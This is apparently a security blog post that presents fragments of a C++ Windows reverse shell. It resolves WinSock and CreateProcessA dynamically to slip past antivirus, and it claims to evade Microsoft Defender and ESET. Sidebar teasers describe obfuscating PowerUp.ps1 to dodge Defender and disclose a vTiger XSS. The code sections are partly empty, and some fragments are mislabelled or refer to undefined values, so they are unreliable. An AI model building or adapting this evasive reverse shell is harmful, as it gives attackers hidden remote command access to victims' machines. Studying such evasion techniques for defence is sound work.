C++ Reverse Shell attempting obfuscation while dynamically loading API.

 C++ Reverse Shell Attempting Obfuscation While Dynamically Loading Windows API


This time, I wrote a Reverse Shell in C++, attempting to bypass AV by loading Windows APIs dynamically.
Sadly, this time I could not use antiscan.me to test this Shell since that site is not working anymore.

The Reverse Shell uses the following Windows API:
  • LoadLibraryA
  • GetProcAddress
  • WSAStartup
  • WSASocketA
  • WSAConnectA
  • CreateProcessA
  • ExitProcess
Every API has been loaded dynamically to try to bypass AV controls.

Loading Windows API Dynamically:

How to Read the Following Paragraph

// Creating the signature of the function
// Creating an instance of the function
// Calling the function 

LoadLibraryA Becomes loader

using loader = HMODULE(__stdcall*)(LPCSTR);

loader loader_a = reinterpret_cast<loader>((FARPROC)GetProcAddress(LoadLibraryA(x), "LoadLibraryA"));

getter getter_a = reinterpret_cast<getter>((FARPROC)GetProcAddress(loader_a(x), "GetProcAddress"));

GetProcAddress Becomes getter

using getter = FARPROC(__stdcall*)(HMODULE, LPCSTR);

getter getter_a = reinterpret_cast<getter>((FARPROC)GetProcAddress(loader_a(x), "GetProcAddress"));

wsa_1 wsa_a = reinterpret_cast<wsa_1>((FARPROC)getter_a(loader_a(y), "WSAStartup"));

WSAStartup Becomes wsa_1

using wsa_1 = int(__stdcall*)(WORD, LPWSADATA);

wsa_1 wsa_a = reinterpret_cast<wsa_1>((FARPROC)getter_a(loader_a(y), "WSAStartup"));

wsa_a(a, &b);

WSASocketA Becomes wsa_2

using wsa_2 = SOCKET (__stdcall*)(int, int, int, LPWSAPROTOCOL_INFOA, DWORD, DWORD); 

wsa_2 wsa_b = reinterpret_cast<wsa_2>((FARPROC)getter_a(loader_a(y), "WSASocketA"));

SOCKET s = wsa_b(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);

WSAConnectA Becomes wsa_3

using wsa_3 = int(__stdcall*)(SOCKET, const sockaddr*, int, LPWSABUF, LPWSABUF, int, int); 

wsa_3 wsa_c = reinterpret_cast<wsa_3>((FARPROC)getter_a(loader_a(y), "WSAConnectA"));

wsa_c(s, (sockaddr *)&server, sizeof(server), nullptr, nullptr, NULL, NULL);

ExitProcess Becomes cp

using cp = bool(__stdcall*)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION);

cp cp_a = reinterpret_cast<cp>((FARPROC)getter_a(loader_a(y), "CreateProcessA"));

cp_a(NULL, cmd, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo);

CreateProcessA Becomes  ep

using ep = void(__stdcall*)(UINT);

ep ep_a = reinterpret_cast<ep>((FARPROC)getter_a(loader_a(x), "TerminateProcess"));

ep_a(0);

The Code:

The PoC:



What We Achieved so far:

So far, we are certain that we have successfully bypassed Microsoft Defender and the antivirus known as ESET. Furthermore, we have determined that tools like PeStudio do not detect the usage of the Windows API we employed, as you can see in the screenshot below. Unfortunately, certain APIs, like TerminateProcess, are present due to some compiler magic. You can test this even with a simple 'Hello, World!' snippet.



**This Article is only for informational/Educational porpouse**

Commenti

Posta un commento

Post popolari in questo blog

Case of Study : Hide PowerUp.ps1 from MS Defender

Immagine
Hide PowerUp.ps1 from MS Defender PowerUp.ps1 is a well-known script among pentesters for escalating local privileges. However, since it is fairly old and quite popular, Microsoft Defender detects it as malicious. To use it, we need to either create a custom version of the script or obfuscate the one available online. In this guide, we will use a minimal obfuscation approach. By making small changes to the script, we can bypass Microsoft Defender’s detection and use the script without any issues. What We need A Windows VM with the AV Signatures Updated The PowerUp.ps1 Script ( here ) The Tool DefenderCheck made by matterpreter ( here ) Notepad Let's Start The first step is to disable Microsoft Defender temporarily so we can download the PowerUp.ps1 script without interference. After disabling Windows Defender, go to the GitHub page that contains the raw version of PowerUp.ps1. Copy the content and save it in Notepad with a .ps1 extension. Once you have downloaded both the PowerUp ...
Continua a leggere

Unveiling CVE-2024-44777, CVE-2024-44778, and CVE-2024-44779

Immagine
Unveiling CVE-2024-44777 , CVE-2024-44778 , and CVE-2024-44779 How Curiosity and Boredom Can Lead to Discovering Unknown Vulnerabilities In this discussion, I will focus on vTiger CRM 7.4.0, an older version of the CRM platform that, despite its age, remains an important research target.  I discovered a Reflected XSS vulnerability in this version, which is especially concerning since there is no public CVE associated with it.so many users are likely unaware of this security risk.
Continua a leggere